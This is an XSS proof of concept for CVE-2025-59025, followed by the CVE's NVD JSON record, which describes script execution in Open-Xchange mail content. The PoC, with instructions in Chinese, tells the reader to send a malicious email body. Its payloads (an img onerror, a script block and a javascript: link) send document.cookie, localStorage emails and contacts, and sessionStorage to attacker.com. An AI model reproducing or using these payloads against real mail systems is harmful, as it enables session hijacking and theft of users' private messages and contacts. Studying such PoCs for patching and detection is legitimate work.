CVE-2025-59025

<!-- CVE-2025-59025 PoC: Malicious email content for XSS --> <html> <body> <h3>CVE-2025-59025 XSS PoC</h3> <p>发送以下HTML内容作为邮件正文：</p> <pre> &lt;img src=x onerror='fetch("https://attacker.com/steal?cookie="+document.cookie)'&gt; &lt;script&gt; // 窃取用户会话信息 fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, emails: localStorage.getItem('emails'), contacts: localStorage.getItem('contacts') }) }); &lt;/script&gt; &lt;a href="javascript:fetch('https://attacker.com/log?data='+btoa(JSON.stringify(window.sessionStorage)))"&gt;Click me&lt;/a&gt; </pre> <p>当受害者预览或查看此邮件时，脚本代码将执行。</p> </body> </html>

{"cve": {"id": "CVE-2025-59025", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:51.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious e-mail content can be used to execute script code. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Sanitization has been updated to avoid such bypasses. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}